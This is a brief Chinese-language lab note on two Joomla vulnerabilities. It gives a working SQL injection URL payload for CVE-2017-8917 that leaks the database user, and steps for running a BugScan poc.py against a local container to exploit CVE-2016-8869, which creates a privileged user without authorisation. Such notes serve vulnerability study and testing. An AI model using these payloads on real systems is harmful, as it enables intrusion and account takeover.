Joomla

3.7.0 (CVE-2017-8917) SQL注入 pyload:

http://ip/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
title


3.4.4-3.6.3未授权创建特权用户(CVE-2016-8869) 使用poc.py

1、 下载并安装 BugScan SDK 详见 BugScan 插件开发文档 - 环境配置

2、 修改 poc.py 中地址为容器地址

if __name__ == '__main__':
   from dummy import *
   audit(assign(fingerprint.joomla, "http://localhost:8000")[1])
3、 运行 poc.py
$ python poc.py